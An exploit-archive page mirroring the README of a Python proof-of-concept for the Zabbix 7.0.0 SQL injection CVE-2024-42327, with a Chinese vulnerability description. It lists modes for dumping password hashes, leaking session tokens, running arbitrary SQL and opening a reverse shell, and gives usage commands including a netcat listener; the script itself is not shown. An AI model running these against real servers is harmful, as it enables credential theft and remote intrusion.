Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-42327 PoC — Zabbix SQL注入漏洞

Source
https://github.com/874anthony/CVE-2024-42327_Zabbix_SQLi
Associated Vulnerability
Title:Zabbix SQL注入漏洞 (CVE-2024-42327)
Description:Zabbix是Zabbix公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix 6.0.0至6.0.31版本、6.4.0至6.4.16版本和7.0.0版本存在SQL注入漏洞,该漏洞源于CUser类的addRelatedObjects函数中存在SQL注入漏洞,允许攻击者操纵数据库查询。
Description
This is for educational porpuses only. Please do not use agains unathorized systems.
Readme
# 🛡️ Zabbix 7.0.0 SQL Injection Exploit Script

A Python script to exploit a **Zabbix 7.0.0** authenticated SQL injection vulnerability, supporting multiple modes of action including user data extraction, session token leaks, remote command execution (RCE), and custom query injection.

> ⚠️ **DISCLAIMER:**  
> This script is for **educational** and **authorized penetration testing** purposes only.  
> Do **not** use it on systems you do not own or have explicit permission to test.  
> The author is not responsible for any misuse or damage caused by this tool.

---

## ✨ Features

- ✅ Authenticated SQL Injection against Zabbix 7.0.0
- 🧑‍💻 Dump user hashes from the DB
- 🔐 Leak session tokens
- 🐚 Remote code execution via reverse shell (admin token required)
- 🧠 Run custom SQL queries

---

## 🔧 Requirements

- Python 3.6+
- `requests` library

Install requirements if needed:

```bash
pip install requests
```

## 🚀 Usage

```bash
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
```


## 🔘 Available Modes

| Mode	| Description | Requires Admin Token |
| ------------ | ------------ | ------------ |
| leak-users |	Dumps all user IDs, usernames, password hashes, and roles |	❌ |
| leak-tokens | Dumps all active session IDs from the database | ❌ |
| rce | Spawns a reverse shell via item.create exploit |  ✅ |
| custom | Run any custom SQL query via the injection | ❌ |		


## 🧪 Examples
Dump User Hashes

```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
```

Leak Session Tokens

```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
```

Remote Code Execution (Reverse Shell)

```bash
# Start a listener first:
nc -lvnp 9001

# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
```

Custom SQL Injection

```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
```

## 📁 Project Structure

```bash
sqliZabbix.py      # Main exploit script
README.md          # This documentation
```
## 🧑‍💻 Author

Anthony (@874anthony)

Crafted with love & curiosity 🐍

## 🔐 License
This project is released under the MIT License. Please use responsibly.
File Snapshot

 [4.0K]  /data/pocs/8d773782fe4c9b62ec1446a853ff598423627407
├── [2.3K]  README.md
└── [8.6K]  sqliZabbix.py

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.